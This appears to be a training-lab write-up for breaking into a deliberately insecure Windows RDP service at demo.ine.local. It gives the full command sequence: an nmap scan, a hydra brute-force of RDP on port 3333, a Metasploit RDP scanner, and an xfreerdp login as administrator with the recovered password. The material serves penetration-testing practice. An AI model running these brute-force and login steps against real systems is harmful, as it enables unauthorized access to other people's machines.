Windows: Insecure RDP Service

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machines will be accessible at demo.ine.local running a vulnerable RDP service.

Objective: To fingerprint the running RDP service, then exploit the vulnerability using the appropriate method and retrieve the flag!.

Note: rdesktop will not work on this setup as it does not support NLA. Please use xfreerdp to connect to the RDP server.

Dictionaries to use:

/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Tools

The best tools for this lab are:

Nmap
searchsploit
msfconsole
xfreerdp

Writeup

nmap -sSVC demo.ine.local

hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt rdp://demo.ine.local -t 64 -s 3333

msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set rhost demo.ine.local
set rport 3333
run

xfreerdp /u:administrator /p:qwertyuiop /v:demo.ine.local:3333

PreviousWindows: SMB Server PSexec NextWinRM: Exploitation with Metasploit

Last updated 5 months ago